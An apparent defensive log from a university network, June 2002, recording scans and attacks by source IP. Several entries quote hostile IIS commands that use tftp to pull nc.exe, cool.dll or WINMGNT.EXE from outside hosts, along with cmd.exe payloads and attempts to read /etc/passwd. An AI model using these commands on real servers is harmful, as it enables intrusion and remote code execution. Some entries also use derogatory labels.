Short summary of some of the attacks against us for Jun. 2002


 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes

2002/06/01-08:09:07.26 211.21.75.50 (CHTD, Chunghwa Telecom Co.,Ltd.,TAIPEI,TW) scannet for port 22
2002/06/01-09:45:14.05 202.163.198.234 (Boot Camp Internet Center,MANILA,PH)portscan 132.235.16.206
2002/06/01-21:59:19.28 213.30.188.2 (COMPLETEL SAS France) 1. attack IIS server with command:
2002/06/01-21:59:19.28 213.30.188.2 (COMPLETEL SAS France) 2. tftp%20-i%20132.110.2.10%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/02-02:57:48.52 148.235.37.135 (customer-148-235-37-135.uninet.net.mx) scannet for port 515
2002/06/02-06:11:09.90 212.194.141.70 (lns07v-10-70.w.club-internet.fr) scannet for port 21
2002/06/02-06:40:18.04 12.162.131.50 (EISTREAM ,TX,US) scannet for port 1433
2002/06/02-19:25:03.32 24.94.229.45 (okc-94-229-45.mmcable.com) attack unix web server. Attempt to use cgi pgms to get /etc/passwd file
2002/06/02-21:00:51.86 65.93.229.48 (Quebec-HSE-ppp3621825.sympatico.ca) scannet for port 21
2002/06/02-21:21:43.25 24.197.74.196 (wv-pkbrg-ubr-a-024-197-074-196.charterwv.net) ping scan of net
2002/06/02-21:23:21.26 24.197.74.196 (wv-pkbrg-ubr-a-024-197-074-196.charterwv.net) DNS named version scan of net
2002/06/02-21:28:59.09 24.197.74.196 (wv-pkbrg-ubr-a-024-197-074-196.charterwv.net) scan select ips ports 80,443,1080,8000,213,21,25,79,13,
2002/06/02-22:28:04.71 61.147.48.77 (CHINANET Jiangsu province network,CN) MOron still trying to use 132.235.1.70 as dns
2002/06/03-02:30:56.11 193.48.37.4 (test.ensait.fr) 1. attack IIS server w/commands:
2002/06/03-02:30:56.11 193.48.37.4 (test.ensait.fr) 2. tftp.exe/?+-i+136.142.165.42+GET+2.tmp+c:/recycler/_/_tmp/2.tmp
2002/06/03-02:34:15.03 212.187.98.98 (c98098.upc-c.chello.nl) portscan 132.235.18.211
2002/06/03-02:59:12.02 207.140.118.113 (Dot Foods,IL,US) scannet for port 1433
2002/06/03-05:55:36.61 202.70.199.68 (India Online Network Ltd.,MUMBAI,IN) scannet for portr 1433
2002/06/03-05:55:40.31 202.70.199.68 (India Online Network Ltd.,MUMBAI,IN) scannet for port 1433
2002/06/03-09:53:47.75 24.208.182.57 (dhcp024-208-182-057.columbus.rr.com) scan selected ips for port 1521
2002/06/03-11:33:18.52 200.158.46.24 (200-158-46-24.dsl.telesp.net.br) scannet for port 139
2002/06/03-13:23:42.39 194.24.240.8 (VUMS software,PRAGUE,CZ) scannet for port 21
2002/06/03-15:51:39.41 62.194.56.158 (node-c-389e.a2000.nl) 1. attack IIS server 18.115 w/command 
2002/06/03-15:51:39.41 62.194.56.158 (node-c-389e.a2000.nl) 2. tftp+-i+62.194.56.158+get+ServUDaemon.ini+c:\temp\exp4\tmp\ServUDaemon.ini
2002/06/03-16:12:18.06 212.211.87.29 (fra-tgn-oyh-vty29.as.wcom.net) scannet for port 23
2002/06/03-16:12:18.08 212.211.87.29:23 (fra-tgn-oyh-vty29.as.wcom.net) scannet for port 23
2002/06/03-16:17:30.37 212.211.87.29:23 (fra-tgn-oyh-vty29.as.wcom.net) attact selcted ips buff overflow port 6112
2002/06/03-16:17:42.06 212.211.87.29 (fra-tgn-oyh-vty29.as.wcom.net) CDE dtspcd exploit attempt
2002/06/03-20:24:47.59 202.185.203.66:22 (Taman Teknologi Malaysia,KUALA LUMPUR,MY) scannet for port 22
2002/06/03-21:21:40.00 61.147.48.65 (CHINANET Jiangsu province network,CN) MOron still trying to use 132.235.1.70 as dns
2002/06/04-01:01:53.60 131.164.245.23 (0x83a4f517.abnxx3.adsl-dhcp.tele.dk) scannet for port 111, RPC EXPLOIT statdx attack
2002/06/04-02:13:30.85 62.163.164.53 (a164053.upc-a.chello.nl) scannet for prot 1433
2002/06/04-06:46:25.00 63.164.240.12 (cblmdm63-164-240-12.buckeye-express.com) scannet for port 1433
2002/06/04-06:46:25.03 63.164.240.12 (cblmdm63-164-240-12.buckeye-express.com) scannet for port 1433
2002/06/04-07:20:17.10 61.156.9.133 (Taman Teknologi Malaysia,KUALA LUMPUR,MY) scannet for port 111
2002/06/04-08:05:26.53 61.177.251.125 (CHINANET jiangsu province network,CN) 1. attack IIS server w/ command
2002/06/04-08:05:26.53 61.177.251.125 (CHINANET jiangsu province network,CN) 2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/04-08:19:58.38 211.114.0.252 (CIVIL ENGINEERING RESERCH INFORMATION CENTER,KYONGGI,KR) scannet for port 1433
2002/06/04-08:20:09.89 211.114.0.252 (CIVIL ENGINEERING RESERCH INFORMATION CENTER,KYONGGI,KR) scannet for port 515, 53
2002/06/04-10:15:49.09 61.156.9.133 (CHINANET Shandong province network,CN) scannet port 111, buff overflow attacks-sadmind
2002/06/04-12:17:47.51 203.199.70.235 (Videsh Sanchar Nigam Ltd - India-BOMBAY) scannet w/ Large ICMP Packet
2002/06/04-15:27:52.28 24.80.76.244 (h24-80-76-244.vn.shawcable.net) scannet for port 515
2002/06/04-20:37:08.89 208.180.124.10 (cdm-208-124-10-geor.cox-internet.com) scannet for port 1433
2002/06/04-21:12:02.34 67.38.164.215 (adsl-67-38-164-215.dsl.wotnoh.ameritech.net) scannet for port 1214
2002/06/04-21:36:53.60 205.177.13.223:1345 (CAIS Internet,McLean, VA ,US)scannet forr prt 1345
2002/06/05-01:48:43.17 210.186.181.212 (TMnet Telekom Malaysia,MY) finger 123@topdog,try to login as quota template account
2002/06/05-07:27:36.47 202.205.136.37 (National Education Examinations Agency,CN) scannet for port 1433
2002/06/05-11:09:00.38 132.235.94.25 (unregisterd host in ohiou.edu) scannet for port 41524 UDP
2002/06/05-16:28:38.00 213.30.188.2 (ns1.sqp.fr) 1. attack IIS server w/commad:
2002/06/05-16:28:38.00 213.30.188.2 (ns1.sqp.fr) 2. tftp%20-i%20132.110.2.10%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/06-02:39:38.00 63.81.251.131 (Financial Solutions, Inc.,IL,US) scannet for port 21,22,23
2002/06/06-02:39:47.19 63.81.251.131 (Financial Solutions, Inc,IL,US) scannet for port 22,21,23
2002/06/06-13:23:56.94 211.215.87.25 (Hanaro Telecom Co.,SEOUL,KR) scannet for port 1433 (sql server attacks)
2002/06/06-13:33:20.95 63.136.112.117 (63-136-112-117.ADSL.CandW.ky) scannet for port 21, anon ftp attacks
2002/06/07-02:12:37.31 61.177.251.125 (CHINANET jiangsu province network) scannet port 80, also 139,445 on select ips
2002/06/07-02:21:51.56 61.177.251.125 (CHINANET jiangsu province network,CN) ,.2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/07-02:21:51.56 61.177.251.125 (CHINANET jiangsu province network,CN) 1. IIS server attack with command
2002/06/07-05:08:24.34 202.184.225.16 (202-184-225-16.itm.edu.my) scannet with Large ICMP Packet
2002/06/07-07:45:01.35 24.226.250.142 (Cogeco Cable Inc. / St-Hyacinthe,CA) scannet fo rport 139,.445,137
2002/06/07-07:59:26.12 32.102.44.133 (slip-32-102-44-133.az.us.prserv.net)scannet for port 25
2002/06/07-08:53:29.43 203.195.193.34 (203-195-193-34.now-india.net.in)RPC EXPLOIT statdx 
2002/06/07-10:37:58.26 66.13.32.92 (bdsl.66.13.32.92.gte.net) scannet for port 21
2002/06/07-13:22:58.87 193.243.226.22 (Financial Solutions, Inc.,IL,US) scannet for port 1524
2002/06/07-18:24:48.73 211.169.249.164 (korea crap) sacnnet for port 1433
2002/06/07-23:26:57.98 211.108.88.239 (korea crap) sacnnet for port 1433
2002/06/08-02:26:28.61 200.193.230.29 (200-193-230-029-gnace7001.dsl.telebrasilia.net.br) telnet,ftp buff overflow attacks
2002/06/08-02:57:18.66 209.246.81.188 (dialup-209.246.81.188.Dial1.NewYork1.Level3.net) 1. IIS server attack with command:
2002/06/08-02:57:18.66 209.246.81.188 (dialup-209.246.81.188.Dial1.NewYork1.Level3.net)2. tftp.exe%20-i%20209.246.81.188%20get%20nc.exe%20c:\inetpub\scripts\nc.exe
2002/06/08-06:01:33.88 210.77.137.162 (21 ViaNet (China),Inc.,BEIJING,CN) 1. IIS server attack with command;
2002/06/08-06:01:33.88 210.77.137.162 (21 ViaNet (China),Inc.,BEIJING,CN) 2. tftp%20-i%20132.147.160.68%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/08-07:47:27.82 151.29.86.191 (ppp-191-86.29-151.libero.it) scan several ips for ports 21,22,23,ping
2002/06/08-09:39:14.92 212.143.221.169 (ADSLP221-NV64A-p169.adsl.netvision.net.il) 1. IIS serer attacsk with command:
2002/06/08-09:39:14.92 212.143.221.169 (ADSLP221-NV64A-p169.adsl.netvision.net.il) 2. tftp.exe+"-i"+212.143.221.169+get+WINMGNT.EXE+c:\InetPub\scripts\WINMGNT.EXE
2002/06/08-12:37:14.16 203.89.128.30 (ISP Project by BMS Priority International (Pvt.) Ltd.,pk)scannet for port 21
2002/06/08-15:55:57.84 216.102.239.34 (adsl-216-102-239-34.dsl.lsan03.pacbell.net) scannet for port 1433
2002/06/08-16:29:54.80 80.145.108.162 (p50916CA2.dip.t-dialin.net) portscan ace
2002/06/08-20:32:06.89 200.23.18.163 (Universidad Autonoma de la Laguna,Torreon, Coahuila,MX) scannet for port 21,anon ftp attack
2002/06/08-20:32:14.43 61.133.119.130 (shandong weihai traffic cop detachment,CN) scannet for port 21
2002/06/08-20:32:16.86 24.232.207.118 (OL118-207.fibertel.com.ar) SCANNET FOR PORT 21
2002/06/08-22:41:34.97 61.177.251.125 (CHINANET jiangsu province network,CN) 1. massive IIS server attacks with command:
2002/06/08-22:41:34.97 61.177.251.125 (CHINANET jiangsu province network,CN) 2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dl
2002/06/08-22:41:34.97 61.177.251.125 (CHINANET jiangsu province network,CN) 2.tftp%20-i%20132.235.32.73%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/09-04:46:49.31 210.64.188.113 (h113-210-64-188.seed.net.tw) scannet for port 1433
2002/06/09-04:46:51.14 210.64.188.113 (h113-210-64-188.seed.net.tw) scannet for port 1433
2002/06/09-06:52:06.18 203.129.127.3 (APNIC, AU?) scannet for port 111
2002/06/09-08:19:51.31 12.248.83.114 (12-248-83-114.client.attbi.com) scannet ofr prot 1433
2002/06/10-00:26:46.24 80.13.249.245 (APuteaux-112-1-2-245.abo.wanadoo.fr) scanne for port 21
2002/06/10-00:35:47.36 211.196.77.66 (korea crap) sacnnet for port 22
2002/06/10-02:42:57.56 61.177.251.125 ((CHINANET jiangsu province network,CN) 1. massive IIS server attacks with command:
2002/06/10-03:49:24.82 217.34.209.1 (host217-34-209-1.in-addr.btopenworld.com) 1. iis server attack w/ command:
2002/06/10-03:49:24.82 217.34.209.1 (host217-34-209-1.in-addr.btopenworld.com) 2. cmd.exe?/c+mkdir+C:\RECYCLER\S-1-5-21-1984716614-615581561-1606240830-1000\$winnt\$sys\hacked_by_trc_pub5tr0_maker_v0_99_beta
2002/06/10-06:50:00.69 61.177.251.125 (CHINANET jiangsu province network,CN) IIS attack tftp to 132.235.32.101
2002/06/10-10:07:22.06 24.46.65.109 (ool-182e416d.dyn.optonline.net) scannet for port 1433
2002/06/10-13:03:30.36 80.14.66.44 (AAnnecy-201-1-3-44.abo.wanadoo.fr) scannet for port 21
2002/06/10-13:27:10.51 213.177.142.218 (adsl-142-218.wanadoo.be) scannet for ports 137,138,445,ping
2002/06/10-19:09:41.02 80.13.249.223 (APuteaux-112-1-2-223.abo.wanadoo.fr) scannet for port 21
2002/06/10-19:15:28.12 210.77.137.57 (21 ViaNet (China),Inc.,CN) scannet for port 1433
2002/06/10-20:47:28.59 63.136.112.95 (Cable and Wireless LTD -Cayman,CAYMAN ISLANDS,KY) scannet for port 1080
2002/06/10-20:59:03.32 24.168.132.250 (24-168-132-250.nj.rr.com) scannet for port 1433
2002/06/10-21:39:58.17 200.181.83.74 (200-181-083-074-cbace201.dial.telebrasilia.net.br) ping scan of net
2002/06/11-02:25:27.87 4.63.63.233 (lsanca1-ar23-4-63-063-233.lsanca1.dsl-verizon.net) 1. iis server attck w/ 
2002/06/11-02:25:27.87 4.63.63.233 (lsanca1-ar23-4-63-063-233.lsanca1.dsl-verizon.net) 2. copy ...cmd.exe+c:\inetpub\scripts\testing.exe%
2002/06/11-03:13:11.85 216.221.59.66 (dsl-59-66.aei.ca) multple types of IIS attacks against 1 ip
2002/06/11-07:33:43.59 216.208.212.129 (Rivieres-ppp31107.qc.sympatico.ca) scannet for ports 139,445
2002/06/11-10:40:40.13 212.199.237.39 (Golden Lines,IL)iis attack w/command tftp.exe+"-i"+212.199.237.39+get+WINMGNT.EXE+c:\Inetpub\WINMGNT.EXE
2002/06/11-12:56:35.63 66.197.236.172 (Network Operations Center Inc.,PA,US) scannet for port 22
2002/06/11-14:58:07.27 212.179.205.240 (bzq-205-240.red.bezeqint.net) iis attack - tftp.exe+"-i"+212.179.205.240+get+servudaemon.ini+c:\inetpub\servudaemon.ini
2002/06/11-15:45:52.10 203.248.195.182 (korea crap) scannet for port 21
2002/06/11-16:13:28.10 212.57.134.129 (agnitogorsk State Pedagogical Insitute) sannet for port 111
2002/06/11-16:54:37.85 203.199.70.210 (Videsh Sanchar Nigam Ltd - India.) scannet with Large ICMP Packet
2002/06/11-20:19:48.30 80.15.192.157 (APuteaux-112-1-3-157.abo.wanadoo.fr) scannet for port 21
2002/06/12-02:41:35.05 216.190.255.220 (Wasatch Hosting,UT/US) scannet for port 25
2002/06/12-03:58:46.53 217.128.91.97 (AToulouse-105-1-10-97.abo.wanadoo.fr) scannet for port 21
2002/06/12-04:03:10.28 217.128.91.97 (AToulouse-105-1-10-97.abo.wanadoo.fr) scannet for port 21
2002/06/12-04:39:16.67 212.209.107.19 (Cycore AB,SE) IIS attack - tftp.exe?-i+213.51.172.78+GET+Winmgnt.exe+c:\inetpub\scripts\Winmgnt.exe?bbatt=Y?bbatt=Y?bbatt=Y
2002/06/12-07:55:18.04 218.24.129.161 (CHINANET liaoning province network,CN) scannet for port 1080,25
2002/06/12-08:09:44.36 80.14.245.239 (AMontpellier-102-1-3-239.abo.wanadoo.fr) scannet for port 21, anon ftp attacks
2002/06/12-08:29:34.76 210.127.240.66 (Haein Soft,SEOUL,KR) scannet for port 1433
2002/06/12-10:55:00.40 211.147.112.92 (capital network CO., LTD,CN) scannet for port 21
2002/06/12-13:43:01.19 172.183.217.105 (ACB7D969.ipt.aol.com) scannet for port 21, anon ftp attacks
2002/06/12-15:46:47.36 212.254.98.207 (adsl-98-207-glattbrugg1.tiscalinet.ch) ping scan of net
2002/06/12-16:13:44.92 80.200.224.109 (80-200-224-109.adsl.powered-by.skynet.be) 1. attack several IIS servers all day w/
2002/06/12-16:13:44.92 80.200.224.109 (80-200-224-109.adsl.powered-by.skynet.be) 2. tftp+-i+80.200.224.109+GET+nc.exe+nc.exe
2002/06/12-17:13:43.51 203.199.70.235 (idesh Sanchar Nigam Ltd - India.) scannet with Large ICMP Packet
2002/06/12-18:18:56.81 212.254.248.17 (adsl-248-17-glattbrugg2.tiscalinet.ch) scannet for port 21
2002/06/12-18:27:47.62 212.254.97.220 (adsl-97-220-glattbrugg1.tiscalinet.ch) scannet for port 21
2002/06/12-19:23:18.57 217.136.42.155 (adsl-43675.turboline.skynet.be) scann for port 21
2002/06/12-19:26:28.34 218.24.129.161 (CHINANET liaoning province network,CN) scannet frp ort 25
2002/06/13-01:05:43.54 198.233.22.103 (greybox.toolcase.com) scannet for port 21
2002/06/13-04:25:38.43 80.14.106.161 (ANice-104-1-5-161.abo.wanadoo.fr) cannet for port 21
2002/06/13-05:18:06.46 210.93.198.155 (TERRAINNO CO., LTD,SEOUL,KR) scannet fo  prots 21,139,445
2002/06/13-05:38:49.05 210.93.198.155 (TERRAINNO CO., LTD,SEOUL,KR) scannet for port 21,139,445
2002/06/13-12:00:10.95 217.136.243.53 (adsl-95029.turboline.skynet.be) scannet for port 21
2002/06/13-12:36:34.13 195.239.154.86 (Sovam Teleport,RU) scannet for ports 80,8080,3128
2002/06/13-14:51:34.93 216.132.133.115 (Media Chase,LA,US) scannet for port 1433
2002/06/13-14:56:21.97 68.62.123.22 (pcp01099678pcs.tsclos01.al.comcast.net) 1. iis attack w/command:
2002/06/13-14:56:21.97 68.62.123.22 (pcp01099678pcs.tsclos01.al.comcast.net) 2. tftp.exe+"-i"+68.62.123.22+get+WINMGNT.EXE+c:\WINMGNT.EXE
2002/06/13-17:31:04.48 80.15.23.214 (ASte-Genev-Bois-109-1-2-214.abo.wanadoo.fr)  scannet for port 21
2002/06/13-19:30:32.33 43.232.18.20 (usen-43x232x18x20.ap-USEN.usen.ad.jp) scannet for port 22
2002/06/13-20:31:51.56 61.103.103.11 (HITELECOM Kyonggy,HYONGGI,KR) scannet for port 111, buff overflow attack-sadmind
2002/06/13-21:55:48.67 212.195.132.41 (lns17m-9-41.w.club-internet.fr) scannet for port 21
2002/06/14-01:09:10.06 63.136.112.171 (6A3-136-112-171.ADSL.CandW.ky) scannet for port 21
2002/06/14-01:23:01.98 61.207.146.222 (p2222-ipad01fukuhanazo.fukushima.ocn.ne.jp) scannet for port 1433
2002/06/14-03:25:04.80 61.177.251.125 (CHINANET jiangsu province network) iis-132.235.32.73%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/14-05:57:04.78 61.177.251.125 (CHINANET jiangsu province network) scannet for port 80, then some ips on 137
2002/06/14-08:19:40.11 65.160.170.2 (Syncor International Corp.,CA,US) scannet fo rport 1433
2002/06/14-09:56:59.53 65.35.197.70 (6535197hfc70.tampabay.rr.com) ping scan of net
2002/06/14-10:00:44.10 65.160.170.2 (Syncor International Corp.,CA,US) try to login to sql server w/ user sa
2002/06/14-13:18:24.86 213.30.188.2 (ns1.sqp.fr) 1. scannet for port 80, IIS attack w/ command:
2002/06/14-13:18:24.86 213.30.188.2 (ns1.sqp.fr) 2. tftp%20-i%20132.110.2.10%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/14-15:36:44.07 203.80.227.2 (203080227002.ctinets.com) scannet for port 22
2002/06/14-20:44:51.43 211.180.125.27 (Kyungbooktechnopark,KR) scannet for port 21
2002/06/15-14:48:32.44 24.200.226.160 (modemcable160.226-200-24.que.mc.videotron.ca) scan select ips for port 21
2002/06/15-22:14:58.75 211.75.197.213 (Chuan Hsin Yu Feng Enterprises Co., Ltd.,TW) scannet for port 1433
2002/06/16-08:34:03.92 194.206.91.3 (JET LAG,LYON,FR) scannet for port 6112
2002/06/16-10:25:56.40 203.220.132.104 (dialup-104.132.220.203.acc01-geor-bat.comindico.com.au) IIS server attacks, includeing
2002/06/16-10:46:34.93 202.107.54.51 (CHINANET liaoning province network) IIS attack -ftp%20-i%20132.198.155.237%20GET%20cool.dll
2002/06/16-14:53:18.00 211.254.142.199 (korea crap) scannet for port 21
2002/06/16-19:04:12.85 61.138.232.12 (CHINANET xinjiang province network) scannet for port 111, buff oveflow attack-sadmind
2002/06/16-20:08:58.63 194.206.91.3 (JET LAG,LYON,FR) scannet for port 111
2002/06/17-04:09:40.48 204.94.162.82 (TELECOM LABS INC,OR) scannet for port 1433
2002/06/17-05:52:38.90 204.94.162.82 (TELECOM LABS INC,OR,US) try to login to sql server w/ user sa
2002/06/17-10:05:25.12 195.239.154.86 (Sovam Teleport,RU) scannet ofr port  3128,8080,80
2002/06/17-10:28:36.44 194.226.201.199 (Dizla NetworksSt.Petersburg,,RU) scannet for port 8080,3128,1080
2002/06/17-12:42:02.21 218.25.133.51 (CHINANET liaoning province network) scannet for port 25
2002/06/17-13:31:17.65 202.112.13.50 (Tsinghua University,CN) pound on DNS port 40622 w/dns lookup mailst.xjtu.edu.cn
2002/06/17-14:46:43.91 148.223.141.50 (xalapa.cobaev.edu.mx) scannet for port 21
2002/06/17-19:25:52.47 212.74.122.231 (Tiscali UK Limited,GB) scannet for port 1433
2002/06/17-19:59:58.58 12.232.169.251 (12-232-169-251.client.attbi.com) DNS named version attemp scan of net,portmap listing
2002/06/17-20:01:44.78 12.232.169.251 (12-232-169-251.client.attbi.com) 1. attack multiple ips ping scan, telnet&ftp in as root/root
2002/06/17-20:01:44.78 12.232.169.251 (12-232-169-251.client.attbi.com) 2. guest, ftp, anonymous; various SMB probes/attacks
2002/06/17-21:29:21.52 61.177.251.125 (CHINANET jiangsu province network) 1. scannet port 80,139,445  attack IIS servers w/command
2002/06/17-21:29:21.52 61.177.251.125 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/18-05:58:32.97 61.177.251.125 (CHINANET jiangsu province network) 1. scannet for port 80, IIS attack w/ command:
2002/06/18-05:58:32.97 61.177.251.125 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/18-07:30:37.90 194.226.201.199 (Dizla Networks,St.Petersburg,RU) scan several ips for ports 8080,3128,1080
2002/06/18-13:42:12.17 62.2.193.59 (client62-2-193-59.hispeed.ch) sensipost attack on web server
2002/06/18-16:16:46.69 210.97.127.250 (Dukhyun Elementary School,KR) scannet for port 21
2002/06/18-20:35:44.29 194.85.32.18 (ns.runnet.ru) scan several ips for pots 8080,3128,1080
2002/06/18-20:55:14.31 12.232.169.251 (12-232-169-251.client.attbi.com) scannet for port 21,135,137,139
2002/06/18-22:44:20.34 61.177.251.125 (CHINANET jiangsu province network) attack cmd: tftp%20-i%20132.235.32.101%20GET%20cool.dll%20d:\httpodbc.dll
2002/06/18-22:44:20.34 61.177.251.125 (CHINANET jiangsu province network) large number of additionalmore IIS attacks thru 2002/06/19-06:53:59.33
2002/06/18-23:35:13.69 195.16.129.20 (100mbps,MADRID,SP) scannet for port 1433
2002/06/19-00:44:36.55 80.14.22.220 (ARouen-102-1-3-220.abo.wanadoo.fr) scannet for port 21
2002/06/19-05:33:11.04 80.15.23.214 (ASte-Genev-Bois-109-1-2-214.abo.wanadoo.fr) scannet for port 21
2002/06/19-08:28:44.49 202.88.149.134 (Hathway IP Over Cable Internet Access Service,IN) 1. IIS attack. command:
2002/06/19-08:28:44.49 202.88.149.134 (Hathway IP Over Cable Internet Access Service,IN) 2. tftp%20-i%20132.147.133.167%20GET%20cool.dll%20c:\httpodbc.dll

2002/06/19-08:34:31.93 61.160.151.205 (CHINANET jiangsu province network) 1. IIS attack. command:
2002/06/19-08:34:31.93 61.160.151.205 (CHINANET jiangsu province network) 2. tftp%20-i%20132.240.9.150%20GET%20cool.dll%20e:\httpodbc.dll
2002/06/19-08:45:32.24 217.225.86.142 (pD9E1568E.dip.t-dialin.net) scannet for port 21
2002/06/19-12:31:23.19 80.11.24.98 (AOrleans-201-1-1-98.abo.wanadoo.fr) scannet for port 21
2002/06/19-21:02:57.89 61.177.251.125 (HINANET jiangsu province network) 1. massive IIS attack. command:
2002/06/19-21:02:57.89 61.177.251.125 (HINANET jiangsu province network) 2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll
2002/06/19-21:26:52 132.235.19.35 (OU) portscan 132.235.17.17 ports 32768 - 65535
2002/06/19-22:35:28.35 194.85.32.18 (ns.runnet.ru) scannet for port 8080,1080,3128
2002/06/19-23:28:11.06 210.217.28.38 (korea crap) scannet for por t1524
2002/06/20-06:54:02.39 61.160.151.181 (CHINANET jiangsu province network) IIS attacs tftp%20-i%20132.240.9.150
2002/06/20-07:24:42.16 139.67.33.4 (Panther4424.eiu.edu) iis attack: copy+c:\winnt\system32\cmd.exe+gooni.exe
2002/06/20-08:38:36.24 213.123.49.230 (host213-123-49-230.in-addr.btopenworld.com)  scannet for SMB C access
2002/06/20-09:51:34.26 12.38.64.29 (wis-ppp-1045.westelcom.com) scannet for SMB C access
2002/06/20-10:36:20.13 216.160.238.191 (bdslppp191.slkc.uswest.net) scannet for SMB C access
2002/06/20-10:42:35.20 212.211.87.3 (fra-tgn-oyh-vty3.as.wcom.net) scannet for port 21, dtspcd buff overflow attacks on several
2002/06/20-10:42:35.44 212.211.87.3 (fra-tgn-oyh-vty3.as.wcom.net) scannet for port 21,6112 1524,buff overflow attacks
2002/06/20-11:03:32.97 216.204.134.35 (dialin134-35.pwm.neonline.net) scannet for SMB C access
2002/06/20-11:18:49.61 61.216.64.39 (61-216-64-39.HINET-IP.hinet.net) probe SMB on 132.235.16.97
2002/06/20-12:25:36.54 203.200.148.123 (Videsh Sanchar Nigam Ltd - India.) try to login to 17.17 as root,guest,shivdev
2002/06/20-12:54:23.27 203.213.60.3 (syd-ts8-2600-003.tpgi.com.au) scannet for SMB C access
2002/06/20-14:34:25.56 12.90.11.142 (142.philadelphia-15-20rs.pa.dial-access.att.net) scannet for SMB C access
2002/06/20-15:35:35.87 24.187.125.160  (ool-18bb7da0.dyn.optonline.net) scannet for ports 137,139,445,80
2002/06/20-18:52:32.37 210.230.200.61 (BROOKLANDS CO.,LTD.,JP) scannet for port 22
172.181.206.205 anon ftp attacks
2002/06/20-21:19:03.54 80.8.242.232 (ca-marseille-77-232.abo.wanadoo.fr) scannet for port 21
2002/06/21-03:33:08.19 24.66.94.142 (px3nr.wp.shawcable.net) iis attack tftp.exe+%22-i%22+24.85.76.10+get+nc.exe+c:\nc.exe
2002/06/21-06:11:02.94 80.136.17.238 (p508811EE.dip.t-dialin.net) pound on web server on  132.235.18.115
2002/06/21-14:43:45.13 65.86.149.68 ( ) scannet for port 23
2002/06/21-17:21:30.02 211.95.72.22 ( ) scannet for port 22
2002/06/21-23:20:14.03 63.208.234.195 ( ) scannet for port 1214
2002/06/22-02:23:07.12 24.97.176.140 ( ) scannet for port 21
2002/06/22-09:35:52.04 217.128.32.191 ( ) scannet for port 21
2002/06/22-14:49:37.22 61.33.27.10 ( ) scannet for port 21
2002/06/22-15:18:27.21 211.185.158.1 ( ) scannet for port 1433
2002/06/22-16:42:03.10 62.219.204.224 ( ) scannet for port 21
2002/06/22-20:40:08.10 63.136.113.2 ( ) scannet for port 139 445 80
2002/06/22-22:26:04.06 161.58.90.165 ( ) scannet for port 139
2002/06/23-18:40:18.32 203.116.235.226 ( ) scannet for port 22 23
2002/06/24-01:16:50.78 203.166.29.198 ( ) scannet for port 1524
2002/06/24-03:37:33.89 203.149.149.189 ( ) scannet for port 21
2002/06/24-11:49:15.13 205.252.89.25 ( ) scannet for port 6112
2002/06/24-17:39:38.17 211.63.142.57 ( ) scannet for port 1433
2002/06/24-21:51:28.15 211.196.47.4 ( ) scannet for port 1433
2002/06/24-23:37:49.18 64.246.26.137 ( ) scannet for port 21
2002/06/25-00:47:18.19 12.254.177.80 ( ) scannet for port 25
2002/06/25-01:20:02.42 129.59.202.18 ( ) scannet for port 139
2002/06/25-05:14:30.31 80.14.180.238 ( ) scannet for port 21
2002/06/25-09:50:42.43 24.208.182.19 ( ) scannet for port 204 ports
2002/06/25-16:13:27.54 210.18.10.70 ( ) scannet for port 21
2002/06/25-18:12:23.14 80.14.210.25 ( ) scannet for port 445 21 139
2002/06/26-03:37:43.74 218.25.133.55 ( ) scannet for port 25
2002/06/26-14:49:24.04 66.191.112.172 ( ) scannet for port 1433
2002/06/26-22:04:03.07 200.203.238.253 ( ) scannet for port 21
2002/06/27-03:35:31.15 209.47.27.187 ( ) scannet for port 445 139
2002/06/27-12:56:38.48 164.77.240.178 (ENTEL CHILE S.A. ,SANTIAGO,CL) 1. multiple attempts to anon ftp passwd file
2002/06/27-12:56:38.48 164.77.240.178 (ENTEL CHILE S.A. ,SANTIAGO,CL) 2. Thru 2002/06/27-20:17:01.23
2002/06/27-13:33:31.06 193.13.73.138 ( ) scannet for port 21 22
2002/06/27-13:55:22.45 168.103.224.38 ( ) scannet for port 8080 1080 3128
2002/06/27-15:54:49.59 80.15.150.44 ( ) scannet for port 21
2002/06/27-22:47:47.41 210.97.36.2 ( ) scannet for port 1433
2002/06/28-08:08:26.08 172.181.138.221 ( ) scannet for port 1433
2002/06/28-13:59:38.10 80.11.175.121 ( ) scannet for port 1433
2002/06/28-14:44:31.05 212.68.242.60 ( ) scannet for port 1433
2002/06/28-17:12:46.07 200.34.38.11 ( ) scannet for port 21
2002/06/29-04:53:25.51 62.220.2.22 ( ) scannet for port 21
2002/06/29-06:05:43.13 130.39.224.175 ( ) scannet for port 111
2002/06/29-07:09:42.11 65.186.43.201 ( ) scannet for port 1214
2002/06/29-16:38:41.91 64.69.92.2 (92.2.novustelecom.net) attack IIS servers  w/ tftp.exe+%22-i%22+64.69.92.2+get+nc.exe+c:\nc.exe
2002/06/30-00:59:11.56 67.250.110.141 (1Cust141.tnt1.kennewick.wa.da.uu.net) 1.  attack IIS servers  w/ command:
2002/06/30-00:59:11.56 67.250.110.141 (1Cust141.tnt1.kennewick.wa.da.uu.net) 2. tftp+-i+%2067.250.110.141+GET+TzoLibr.dll+c:\inetpub\wwwroot\_private\TzoLibr.dll
2002/06/30-11:44:43.91 212.64.111.197 (9dyn197.ztm.casema.net) 1. attack IIS servers w/command:
2002/06/30-11:44:43.91 212.64.111.197 (9dyn197.ztm.casema.net) 2. tftp+-i+212.64.111.197+get+servud~1.ini+c:\winnt\system32\ServUDaemon.ini
2002/06/30-12:12:35.81 65.239.90.211 (1Cust211.tnt5.kennewick.wa.da.uu.net) 1. attack IIS servers w/command:
2002/06/30-12:12:35.81 65.239.90.211 (1Cust211.tnt5.kennewick.wa.da.uu.net) tftp+-i+%2065.239.90.211+GET+TzoLibr.dll+c:\inetpub\wwwroot\_private\TzoLibr.dll